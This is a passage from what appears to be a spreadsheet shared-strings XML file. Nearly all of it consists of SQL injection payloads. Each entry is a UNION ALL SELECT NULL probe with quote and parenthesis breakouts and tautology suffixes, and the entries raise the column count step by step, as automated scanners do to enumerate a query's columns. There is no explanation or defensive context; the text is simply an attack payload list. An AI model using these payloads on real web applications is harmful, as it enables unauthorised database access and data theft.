    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "xSgt" = "xSgt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yome" = "yome</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ldeR" = "ldeR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "sWCy" = "sWCy</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "UMxf" = "UMxf</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "pxiS" = "pxiS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "kNbw" = "kNbw</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "NmFz" = "NmFz</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "oUXv" = "oUXv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "eVOG" = "eVOG</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "XEsf" = "XEsf</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "AYMW" = "AYMW</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "LsaC" = "LsaC</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "jrwW" = "jrwW</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "ITOA" LIKE "ITOA</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "liLG" LIKE "liLG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "nGoG" LIKE "nGoG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "PUQF" LIKE "PUQF</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "QoMt" LIKE "QoMt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Wzwk" LIKE "Wzwk</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "glGj" LIKE "glGj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "vbkh" LIKE "vbkh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "CNDU" LIKE "CNDU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "CFUH" LIKE "CFUH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "cWxu" LIKE "cWxu</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "wTGT" LIKE "wTGT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "eDTz" LIKE "eDTz</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "AjUj" LIKE "AjUj</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "hzoR" LIKE "hzoR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "VUMN" LIKE "VUMN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "RXMZ" LIKE "RXMZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "RPDg" LIKE "RPDg</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "vKOm" LIKE "vKOm</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "AXnh" LIKE "AXnh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "bXDu" LIKE "bXDu</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "PkcU" LIKE "PkcU</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yrgA" LIKE "yrgA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ALjN" LIKE "ALjN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yxLw" LIKE "yxLw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "mWyU" LIKE "mWyU</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "tvko" LIKE "tvko</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "LYRB" LIKE "LYRB</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "nwrD" LIKE "nwrD</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ajoS" LIKE "ajoS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "epJx" LIKE "epJx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "holk" LIKE "holk</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "NRwh" LIKE "NRwh</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "DDNR" LIKE "DDNR</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Jxrb" LIKE "Jxrb</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Mvig" LIKE "Mvig</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "mdjh" LIKE "mdjh</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "TYOi" LIKE "TYOi</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "IYaY" LIKE "IYaY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "HCer" LIKE "HCer</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>'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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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AND  ( 815 = 815</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 136 = 136</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6365 = 6365</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2913 = 2913</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 9743 = 9743</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 456 = 456</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3391 = 3391</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7341 = 7341</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3930 = 3930</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6041 = 6041</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6838 = 6838</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6276 = 6276</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7998 = 7998</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  4367 = 4367</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7368 = 7368</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5988 = 5988</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5702 = 5702</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6995 = 6995</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6873 = 6873</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  4535 = 4535</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1686 = 1686</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3515 = 3515</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5088 = 5088</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6596 = 6596</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 9095 = 9095</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 181 = 181</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3940 = 3940</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8953 = 8953</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 364 = 364</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3294 = 3294</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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AND  ( 'zISD' = 'zISD</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'FDhQ' = 'FDhQ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'PsXz' = 'PsXz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'RbSz' = 'RbSz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'lWFt' = 'lWFt</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'WlUL' = 'WlUL</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'hBwi' = 'hBwi</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'rmgw' = 'rmgw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'HRCf' = 'HRCf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'yQXa' = 'yQXa</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'uqQy' = 'uqQy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'ARCQ' = 'ARCQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'WirD' = 'WirD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'QNLS' = 'QNLS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'WRBp' = 'WRBp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'yuAe' = 'yuAe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'NpDF' = 'NpDF</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'szHn' = 'szHn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'asJJ' = 'asJJ</t>
  </si>
  <si>
